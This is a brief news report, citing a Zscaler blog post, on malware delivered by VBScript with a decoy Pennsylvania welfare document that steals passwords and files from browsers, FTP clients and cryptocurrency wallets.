The malware uses Microsoft Intermediate Language payload that is compiled to steal passwords from the victim’s system, browser and FTP software, according to an Oct. 4 Zscaler blog post.
“The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate,” researchers said in the post.
The decoy appears to be a “public service” message from the Pennsylvania Department of Public Welfare that includes spam mitigation instructions.
The VBScript downloads the decoy, terminates the Microsoft Word process, downloads the payload via a PowerShell command, and removes the documents recovery entries of Microsoft Word though registry entries.
Researchers said the malware performs various password stealing activities such as checking for antivirus and looking into the directories and files from which it will steal information once executed.
“The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware’s C&C once it grabs the sensitive information,” the post said.
The malware seeks to steal passwords from Armory Wallet, Chrome, Firsefox, CuteFTP, FileZilla, Putty, Electrum bitcoin wallet and WinSCP Passwords.